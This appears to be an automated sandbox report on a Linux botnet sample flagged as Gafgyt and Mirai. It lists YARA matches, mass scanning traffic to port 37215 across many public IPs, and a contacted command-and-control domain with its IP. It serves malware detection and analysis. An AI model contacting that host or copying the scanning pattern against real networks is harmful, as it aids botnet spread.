Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: classification engine

Classification label: mal92.spre.troj.linELF@0/1@1/0

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /bin/fusermount (PID: 5511)

File: /proc/5511/mounts

Jump to behavior

Creates hidden files and/or directories

Source: /usr/lib/upower/upowerd (PID: 5462)	Directory: <invalid fd (12)>/..	Jump to behavior
Source: /usr/lib/upower/upowerd (PID: 5462)	Directory: <invalid fd (11)>/..	Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5507)	Directory: <invalid fd (9)>/..	Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5507)	Directory: <invalid fd (8)>/..	Jump to behavior
Source: /usr/lib/upower/upowerd (PID: 5657)	Directory: <invalid fd (12)>/..	Jump to behavior
Source: /usr/lib/upower/upowerd (PID: 5657)	Directory: <invalid fd (11)>/..	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5745)	Directory: /home/saturnino/.config	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 48862 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 48862
Source: unknown	Network traffic detected: HTTP traffic on port 38244 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36676 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36676
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38324 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 38324
Source: unknown	Network traffic detected: HTTP traffic on port 58002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36882
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40152 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 32890 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54556 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34970 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 40728
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39724 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34342 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34342
Source: unknown	Network traffic detected: HTTP traffic on port 45022 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36320 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Yara detected Mirai

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Gafgyt

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Yara detected Mirai

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
197.128.22.103	unknown	Morocco	6713	IAM-ASMA	false
197.231.215.3	unknown	unknown	36974	AFNET-ASCI	false
197.130.162.10	unknown	Morocco	6713	IAM-ASMA	false
153.198.67.43	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
157.229.105.50	unknown	United States	122	UPMC-AS122US	false
157.82.48.228	unknown	Japan	2501	UTNETTheUniversityofTokyoJP	false
157.57.242.69	unknown	United States	3598	MICROSOFT-CORP-ASUS	false
197.19.253.193	unknown	Tunisia	37693	TUNISIANATN	false
197.59.229.29	unknown	Egypt	8452	TE-ASTE-ASEG	false
138.15.239.4	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
157.215.239.61	unknown	United States	4704	SANNETRakutenMobileIncJP	false
197.76.213.117	unknown	South Africa	16637	MTNNS-ASZA	false
41.108.83.77	unknown	Algeria	36947	ALGTEL-ASDZ	false
187.27.7.220	unknown	Brazil	22085	ClaroSABR	false
197.160.244.183	unknown	Egypt	24863	LINKdotNET-ASEG	false
41.227.18.69	unknown	Tunisia	2609	TN-BB-ASTunisiaBackBoneASTN	false
197.234.167.179	unknown	South Africa	37315	CipherWaveZA	false
197.71.86.140	unknown	South Africa	16637	MTNNS-ASZA	false
197.60.107.98	unknown	Egypt	8452	TE-ASTE-ASEG	false
157.194.39.12	unknown	United States	4704	SANNETRakutenMobileIncJP	false
41.198.207.244	unknown	South Africa	327693	ECHO-SPZA	false
41.230.97.182	unknown	Tunisia	37705	TOPNETTN	false
197.73.219.208	unknown	South Africa	16637	MTNNS-ASZA	false
197.102.233.94	unknown	South Africa	3741	ISZA	false
197.166.142.54	unknown	Egypt	24863	LINKdotNET-ASEG	false
197.224.41.182	unknown	Mauritius	23889	MauritiusTelecomMU	false
19.242.1.180	unknown	United States	3	MIT-GATEWAYSUS	false
157.227.65.47	unknown	Australia	4704	SANNETRakutenMobileIncJP	false
41.142.174.167	unknown	Morocco	36903	MT-MPLSMA	false
157.146.162.192	unknown	United States	719	ELISA-ASHelsinkiFinlandEU	false
81.113.214.158	unknown	Italy	20959	TELECOM-ITALIA-DATA-COMIT	false
41.35.57.84	unknown	Egypt	8452	TE-ASTE-ASEG	false
157.41.214.252	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
186.178.176.191	unknown	Ecuador	28006	CORPORACIONNACIONALDETELECOMUNICACIONES-CNTEPEC	false
109.49.178.67	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
208.32.74.190	unknown	United States	394945	EXPD-ASNUS	false
41.122.213.82	unknown	South Africa	16637	MTNNS-ASZA	false
41.17.0.106	unknown	South Africa	29975	VODACOM-ZA	false
142.133.143.202	unknown	Canada	8147	ASERICYUS	false
197.43.51.120	unknown	Egypt	8452	TE-ASTE-ASEG	false
121.229.221.149	unknown	China	23650	CHINANET-JS-AS-APASNumberforCHINANETjiangsuprovinceba	false
157.37.178.134	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
41.39.124.167	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.8.13.52	unknown	South Africa	29975	VODACOM-ZA	false
41.92.37.101	unknown	Morocco	36925	ASMediMA	false
197.40.144.185	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.165.243.16	unknown	South Africa	36937	Neotel-ASZA	false
41.149.186.125	unknown	South Africa	5713	SAIX-NETZA	false
190.207.174.24	unknown	Venezuela	8048	CANTVServiciosVenezuelaVE	false
157.182.20.36	unknown	United States	12118	WVUUS	false
157.57.242.31	unknown	United States	3598	MICROSOFT-CORP-ASUS	false
197.224.41.174	unknown	Mauritius	23889	MauritiusTelecomMU	false
126.111.87.243	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
197.71.86.123	unknown	South Africa	16637	MTNNS-ASZA	false
41.95.85.7	unknown	Sudan	36998	SDN-MOBITELSD	false
197.33.36.84	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.215.11.64	unknown	Kenya	15808	ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKE	false
157.220.202.152	unknown	United States	4704	SANNETRakutenMobileIncJP	false
197.202.110.238	unknown	Algeria	36947	ALGTEL-ASDZ	false
41.57.232.97	unknown	Ghana	37103	BUSYINTERNETGH	false
41.143.104.78	unknown	Morocco	36903	MT-MPLSMA	false
167.216.36.47	unknown	United States	10348	HTDCUS	false
197.116.212.219	unknown	Algeria	36947	ALGTEL-ASDZ	false
203.96.78.220	unknown	New Zealand	4648	SPARK-NZGlobal-GatewayInternetNZ	false
70.30.247.10	unknown	Canada	577	BACOMCA	false
197.144.115.218	unknown	Morocco	36884	MAROCCONNECTMA	false
41.66.91.118	unknown	South Africa	22750	BCSNETZA	false
157.251.170.240	unknown	United States	32934	FACEBOOKUS	false
45.99.51.242	unknown	Egypt	37069	MOBINILEG	false
157.179.150.128	unknown	Thailand	15337	WRHARPERUS	false
41.105.231.143	unknown	Algeria	36947	ALGTEL-ASDZ	false
197.190.12.229	unknown	Ghana	37140	zain-asGH	false
157.245.211.184	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
157.0.158.249	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
197.75.183.131	unknown	South Africa	16637	MTNNS-ASZA	false
119.225.95.94	unknown	Australia	7474	OPTUSCOM-AS01-AUSingTelOptusPtyLtdAU	false
41.165.243.73	unknown	South Africa	36937	Neotel-ASZA	false
41.41.152.229	unknown	Egypt	8452	TE-ASTE-ASEG	false
205.234.68.103	unknown	United States	6295	GREENHOUSE-WAUS	false
41.177.92.59	unknown	South Africa	36874	CybersmartZA	false
157.220.202.173	unknown	United States	4704	SANNETRakutenMobileIncJP	false
157.42.153.20	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
171.204.24.105	unknown	United States	10794	BANKAMERICAUS	false
157.157.15.93	unknown	Iceland	6677	ICENET-AS1IS	false
197.108.43.37	unknown	South Africa	37168	CELL-CZA	false
197.16.42.185	unknown	Tunisia	37693	TUNISIANATN	false
106.94.227.22	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
140.13.164.141	unknown	United States	23700	FASTNET-AS-IDLinknet-FastnetASNID	false
197.237.248.102	unknown	Kenya	15399	WANANCHI-KE	false
157.227.65.11	unknown	Australia	4704	SANNETRakutenMobileIncJP	false
197.76.213.166	unknown	South Africa	16637	MTNNS-ASZA	false
109.154.121.220	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
41.138.141.98	unknown	Mauritania	37541	CHINGUITELMR	false
222.60.154.248	unknown	China	63711	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
41.76.191.203	unknown	Kenya	37225	NETWIDEZA	false
41.242.158.86	unknown	unknown	328594	SUDATCHAD-ASTD	false
41.41.152.233	unknown	Egypt	8452	TE-ASTE-ASEG	false
157.176.156.241	unknown	United States	22192	SSHENETUS	false
41.104.241.214	unknown	Algeria	36947	ALGTEL-ASDZ	false
201.79.172.50	unknown	Brazil	7738	TelemarNorteLesteSABR	false

Contacted Domains

Name	IP	Active
9wg0dstmud.pirate	2.58.95.134	true

Name	Type	MD5	SHA1	SHA256
/run/user/127/dconf/user	very short file (no magic)	93B885ADFE0DA089CDF634904FD59F71	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D

AV Detection

Multi AV Scanner detection for submitted file

Source: skid.x86.elf	ReversingLabs: Detection: 57%
Source: skid.x86.elf	Virustotal: Detection: 38%			Perma Link

Machine Learning detection for sample

Source: skid.x86.elf

Joe Sandbox ML: detected

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 183.220.195.19 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 191.61.224.12 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 157.17.36.152 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 197.181.58.88 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 41.117.210.187 ports 1,2,3,5,7,37215

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 48862 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 48862
Source: unknown	Network traffic detected: HTTP traffic on port 38244 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36676 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36676
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38324 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 38324
Source: unknown	Network traffic detected: HTTP traffic on port 58002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36882
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40152 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 32890 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54556 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34970 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 40728
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39724 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34342 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34342
Source: unknown	Network traffic detected: HTTP traffic on port 45022 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36320 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.13:39112 -> 2.58.95.134:64356
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 124.214.75.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.21.166.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.206.163.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 44.253.142.120:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.211.68.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 114.221.104.92:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.6.15.225:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.234.48.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.191.158.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.100.138.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.50.160.50:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 207.111.133.132:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 13.235.186.163:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.157.185.177:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 147.145.88.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.207.179.134:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.21.254.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.32.192.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.88.12.59:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.49.245.78:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 125.58.206.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.45.229.166:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 97.47.136.140:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.37.86.162:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.42.91.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 220.133.39.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.115.229.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.79.35.182:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.174.86.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.103.25.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 196.113.10.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.106.141.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 45.221.209.59:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.115.34.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.117.221.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.170.123.12:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.53.176.245:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.27.37.233:37215
